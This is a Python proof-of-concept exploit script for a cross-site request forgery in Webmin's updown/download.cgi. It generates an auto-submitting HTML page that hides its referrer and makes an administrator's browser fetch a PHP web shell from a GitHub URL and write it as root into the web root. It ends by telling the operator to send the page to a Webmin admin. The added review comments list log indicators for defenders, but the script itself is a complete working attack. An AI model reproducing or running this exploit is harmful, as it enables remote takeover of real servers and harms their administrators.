import time
# Start-up banner: ASCII art wrapped in ANSI colour escapes (\033[1;37m ... \033[1;m).
# Purely cosmetic; nothing here touches the network or the filesystem.
banner_art = '''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m'''
print(banner_art)
# Credit line redrawn in place from 0 to 100 using a carriage return.
# This is a timed animation only (101 iterations x 0.02 s); no request is sent.
credit_template = "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m"
percent_suffix = "\033[1;36m%\033[1;m"
for i in range(101):
    print(credit_template.format(i), percent_suffix, end="")
    time.sleep(0.02)
# Move past the animated line before prompting.
print("\n\n")
# Base URL of the Webmin instance, read from the operator at the prompt.
# The value is taken verbatim: scheme, host and characters are not validated.
# NOTE(review): CSRF_Generator() later concatenates this string into an HTML
# attribute without escaping, so the generated page is only well-formed for
# plain URLs.
target = input(
    "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

# The form action is built as target + "updown/download.cgi", so make sure
# the base ends with a slash; an existing trailing slash is left alone.
if not target.endswith('/'):
    target += '/'
def CSRF_Generator():
    """Write CSRF_POC.html, an auto-submitting form aimed at updown/download.cgi.

    The page POSTs the hidden fields below to ``<target>updown/download.cgi``
    as soon as it is opened, so the request is made with whatever Webmin
    session the opening browser already holds. ``target`` is the module-level
    string read at start-up and is embedded unescaped.

    Review notes for defenders, taken from the payload itself:
      * The ``referrer`` meta tag tells the browser to omit the Referer
        header, so the demonstration presumably relies on the server
        accepting requests without one -- verify how the Webmin instance is
        configured to treat unknown or missing referrers.
      * Log indicators: a POST to ``updown/download.cgi`` carrying a remote
        ``urls`` value together with ``mkdir=1`` and a ``dir`` under the web
        root, followed by a new ``.php`` file appearing in that directory.
      * The download runs as ``user=root``, so the resulting file write is
        not limited by the web server account's permissions.
    """
    # Markup up to the opening quote of the form's action attribute.
    page_head = '''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''
    # Remainder of the action URL, the hidden fields and the auto-submit script.
    page_tail = '''updown/download.cgi" method="POST">
<input type="hidden" name="urls" value="https://raw.githubusercontent.com/drag0s/php-webshell/master/webshell.php" />
<input type="hidden" name="dir" value="/var/www/html/Mesh3l_Z0ldyck" />
<input type="hidden" name="mkdir" value="1" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="group_def" value="1" />
<input type="hidden" name="bg" value="0" />
<input type="hidden" name="day" value="25" />
<input type="hidden" name="month" value="3" />
<input type="hidden" name="year" value="2021" />
<input type="hidden" name="hour" value="02" />
<input type="hidden" name="min" value="30" />
<input type="hidden" name="email_def" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
'''
    with open('CSRF_POC.html', 'w') as poc_file:
        poc_file.write(page_head + target + page_tail)
    # The with block has already closed the file; this extra close is a no-op
    # kept from the original.
    poc_file.close()

    print("\033[1;36m\nThe CSRF_POC has been generated successfully,send it to a Webmin's Admin and ur web shell gonna be in this path /var/www/html/Mesh3l_Z0ldyck/webshell.php ^_^ \n \033[1;m")
def main():
    """Entry point: generate the CSRF proof-of-concept page and return nothing.

    The banner, the animation and the ``target`` prompt run at import time,
    before this function is called; only the file generation happens here.
    """
    CSRF_Generator()
# Generate the file only when executed as a script. The prompt above this
# guard still runs on import because it sits at module level.
if __name__ == "__main__":
    main()